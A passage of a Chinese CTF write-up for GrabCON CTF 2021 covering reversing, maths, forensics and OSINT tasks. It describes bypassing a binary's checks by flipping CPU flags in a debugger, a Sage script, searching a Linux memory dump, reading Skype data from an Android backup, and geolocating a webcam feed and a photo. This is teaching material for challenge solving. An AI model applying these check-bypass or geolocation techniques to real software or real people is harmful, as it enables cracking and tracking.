回车输入密码一路跟进，经过一个大循环到达可疑位置上方，此时又出现一个跳转，还是修改标志位，不让他跳转，注意此时修改的是SF标志位（之前都是ZF位）

跟进一行又碰到一个跳转，老套路修改标志位，成功进入到可疑分支

继续跟进，发现go_C14，这是字符串“GrabCON{”的地址

一路跟进到一个打印函数，发现打印出flag，flag中括号前后有两个空格要去掉

GrabCON{626c61636b647261676f6e}实际上就是blackdragon的16进制字符串

4.4、Maths

用ida打开分析，该程序先将输入的flag进行hex编码，得到76个字节，将其分为两部分，分别为input1,input2。

然后将其进行一系列的运算得到一个二元四次方程组

通过分析列出如下的方程组（其中x,y为flag的两个部分）

使用sage对等式右边的式子进行因式分解

由此可以得到：

根据上述式子编写sage脚本得到x和y

for i in divisors(v5)://这里的v5是上述等式的左边部分    j=v5//i    if(i+j)%1338==0:        tmp=i-(i+j)//1338        if tmp%1336==0:            x=tmp//1336            y=(j-(i+j)//1338)//1336      print x,y

得到flag为GrabCON{r3v_4nd_m4th_1983eeebb6969ed5

5、Forensics

5.1、First steps

下载memdump.raw文件发现是一个dump下来的linux内存文件，用HxD打开，根据题目提示搜索关键词，linux下创建文件的命令常用的有touch、echo等，既然题目说创建并写入，那先搜索一下echo试试

搜索出来很多条，此时可以用echo + 空格 + 引号搜索，一般Linux下创建并写入都是用 echo “123” > 1.txt这类命令

搜索完成后立刻发现一个可疑的地方，类似shell命令行的一段文本

双击跟进，发现flag，文件为welcome，内容为一段md5（echo的那段base64解密后就是下面那段MD5）

GrabCON{welcome_402051f4be0cc3aad33bcf3ac3d6532b}

5.2、Gang Busted

下载题目，是个安卓系统的文件夹备份

一开始被三个奇怪后缀的app吸引了

后来发现app是后面题目用到的

锁定社交平台是Skype后，开始用Sqlite Studio打开所有数据文件，但都是无用信息和空信息

后来在ProntoDate的提醒下，想到应该有相应的工具

找到Skyperious，一个Skype数据文件读取的工具

找到group name——31337 hax0r plan

找到参会人员和邮箱——evil mike，sidemaf155@5ubo.com

还找到聊天记录，是跟后面的Good Beating题有关，里面有个链接下载good.apk

但apk在安卓文件夹里也有

所以flag就是

GrabCON{skype_sidemaf155@5ubo.com_31337_hax0r_plan_evil_mike}

6、OSINT

6.1、ProtonDate

寻找sc4ry_gh0st@protonmail.com的创建时间

github搜索protondate，发现项目

https://github.com/1cbf94bc-bc47-42b9-9197-244437fad1e6/protondate

运行得到时间

flag为GrabCON{03_09_2021}

6.2、Victim1

进入网站，是一个监控视频

监控里白天有黄色的缆车和雪山，再加上题目标题叫受害者，就查到了意大利今年发生的缆车事故，疯狂输入该事故的城镇名字，一直错误

然后在后面查另一题的网站时把ip地址丢到shodan里一搜

找到Brunico的邮编就对了,GrabCON{39031}

6.3、Victim2

这题是张图片，找图片的位置

右下角有个hotel有名字——SCHENNERHOF

google地图一搜

按照图片角度，就是后面这个Hotel Hohenwart了

所以flag是GrabCON{hotelhohenwart}

阅读原文

跳转微信打开

Red0

第一届Solar杯应急响应挑战赛部分wp

第三届网鼎杯半决赛部分wp

一、突破

SMPP

二、共同防御

三、RHG（人工智能漏洞挖掘）

pwn02

pwn03

pwn04

pwn05

pwn06

pwn07

pwn08

pwn09

pwn10

四、RDG（实景防御）

babyshell

babymaze

RealWorld CTF（体验赛）部分WP

0x2 Evil Mysql Server

0x3 Be-a-Language-Expert

0x4 Apache Commons Text

0x5 Yummy Api

0x6 Be-a-Wiki-Hacker

0x7 babycurve

0x8 Snake

2022网鼎杯白虎组部分wp（新增re-junk）

0x0 junk

阶段三

运行即可得到flag

0x1 签到题

0x4 Web-923

0x5 Misc-620

0x6 misc034

0x7 MISC830

0x8 WEB925

越权漏洞简介

一、越权漏洞简述

API安全浅析

Kill Chain模型概述

Webshell检测方法

联邦学习——打破数据孤岛，建立安全的数据生态

身份鉴别浅析

零信任体系基础

RASP关键技术与相关产品调研

GrabCON CTF 2021 WP

3.1、E4sy Pe4sy

3.2、Basic Calc

4.1、Easy Rev

4.2、Unknow1

4.3、Unknow2

4.4、Maths

5.1、First steps

5.2、Gang Busted